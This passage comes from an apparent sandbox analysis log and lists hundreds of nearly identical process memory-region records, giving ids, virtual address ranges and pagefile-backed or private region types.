= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10265 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10266 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10267 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10268 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10269 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10270 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10271 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10272 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10273 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10274 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10275 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10276 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
10277 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10278 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10279 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10280 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10281 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10282 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10283 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10284 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10285 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10286 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10287 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10288 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10289 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 10290 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10465 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10466 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10467 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10468 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10469 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10470 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10471 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10472 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10473 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10474 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10475 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10476 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10477 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10478 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10479 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10480 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10481 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10482 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10483 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10484 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10485 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10486 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10487 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10488 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10489 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10490 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10491 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10492 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10493 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10494 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10495 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10496 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10503 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10504 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10505 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10506 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10507 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10508 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10509 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10510 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10511 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10512 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10513 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10514 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10515 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10516 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10517 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10518 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10519 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10520 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 10521 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10522 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10523 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10524 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10525 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10526 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10527 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10528 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10529 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10530 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10531 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10532 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10533 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 10534 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10535 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10536 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10537 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10538 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10539 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10540 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10541 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10542 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10543 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10544 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10545 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10546 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10582 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10583 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10584 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10585 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10586 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10587 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10588 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10589 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10590 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10591 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10592 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10593 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10594 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10595 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10596 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10597 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10598 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10599 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10600 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10601 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10602 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10603 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10604 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10605 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10606 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
10607 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10608 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10609 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10610 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10611 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10704 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10705 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10706 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10707 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10708 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10709 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10710 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10711 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 10712 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10713 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10714 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10715 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10716 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10717 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10718 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10719 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10720 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10722 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10724 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 10725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10727 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10728 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10729 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10730 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10731 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10732 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10735 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10736 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10737 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10738 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10739 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10755 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10756 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10757 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10758 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10759 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10760 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10761 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10762 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10763 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10764 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10765 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10766 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10767 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10768 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10769 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10771 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10772 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10773 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10774 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10778 
